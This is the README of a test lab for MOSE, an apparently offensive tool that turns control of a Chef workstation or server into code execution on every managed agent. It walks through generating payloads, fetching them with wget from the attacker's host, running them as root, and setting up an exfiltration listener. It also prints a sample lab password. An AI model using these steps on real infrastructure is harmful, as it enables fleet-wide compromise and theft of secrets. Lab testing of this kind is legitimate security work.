Used to create a test lab that can be used to work with MOSE and Chef.
Warning, take heed: This lab should be run in a controlled environment; it contains vulnerable assets.
You must download and install the following for this environment to work:
To create an environment with a Chef Workstation and a Chef Server that controls multiple agents, run the following command:
cd vagrant && make build && make run-
Build MOSE using
make buildin the MOSE repo -
Generate a payload with MOSE:
./mose -c "touch /tmp/BLA && echo test >> /tmp/BLA" -t chef -
Login to the chef workstation:
# The password is vagrant vagrant ssh chef_workstation -
Escalate to root with
sudo su -
Download the binary from MOSE:
wget http://YOURIPADDRESSGOESHERE:8090/chef-linux` -
Run the payload:
chmod +x chef-linux; ./chef-linux -
Wait for 30 minutes or ssh into one of the agents and kick off the payload manually:
# The password is vagrant vagrant ssh chef_agent_1 sudo su chef-client -
For this example, you should note that a file has been created in
/tmpin all of the chef-agent virtual machines, as we specified in step 2.
-
Build MOSE using
make buildin the MOSE repo -
Generate a payload with MOSE:
./mose -c "touch /tmp/BLA && echo test >> /tmp/BLA" -t chef -l <your local ip address> -ep 9090 -rhost chef-server:10.42.42.10
2a. The exfil listener time can be set with the
-epparameter 2b. The-rhostparameter is a necessity if running against a chef-server. -
Login to the chef server:
vagrant ssh chef_server(the password is vagrant) -
Escalate to root with
sudo su -
Download the binary from MOSE:
wget http://YOURIPADDRESSGOESHERE:8090/chef-linux -
Back on the attacker's system, specify
nfor the target being a workstation andYwhen prompted for the target being a server -
Run the payload:
chmod +x chef-linux; ./chef-linux -
Use the container that is spawned on the attacking machine as if it were a workstation to get the rogue cookbook into place
-
Wait for 30 minutes or ssh into one of the agents and kick off the payload manually:
vagrant ssh chef_agent_1(the password is vagrant)
9a. Escalate to root withsudo su
9b. Runchef-client -
For this example, you should note that a file has been created in
/tmpin all of the chef-agent virtual machines, as we specified in step 2.
To create an environment with a Chef Workstation and a Chef Server that controls a single agent, run the following command:
cd docker/basic && make run-
Build MOSE using
make buildin the MOSE repo -
Wait for 15 minutes or so for the environment to start working. You can track the progress with this command:
while true; do sleep 2; docker logs basic-chef-workstation; done
You will know it's done when you see this:
id: mysql_pw password: TheM0stS3cr3T!!! user: mysql
-
Generate a payload with MOSE:
./mose -c "touch /tmp/test.txt && echo test >> /tmp/test.txt" -t chef -f "${PWD}/payloads/chef-linux"
and be sure to answer
Ywhen prompted. -
Transfer the payload to the chef workstation container:
docker cp payloads/chef-linux basic-chef-workstation:/chef-linux
-
Run the payload:
docker exec -i basic-chef-workstation /bin/bash -c "echo 'n' | /chef-linux"
-
Wait for 30 minutes or exec into the agent and kick off the payload manually:
docker exec -i basic-chef-agent-1 /bin/bash -c "chef-client"
-
Observe that a file has been created on the agent in
/tmp:docker exec -i basic-chef-agent-1 /bin/bash -c "cat /tmp/test.txt"
Please note:
The docker lab does not support transferring payloads to the
target via the web server. You can however generate a payload with
the -f parameter and transfer it via docker cp.
To tear down the test environment, run the following command:
make destroyThe chef server docker container is provided courtesy of this repo.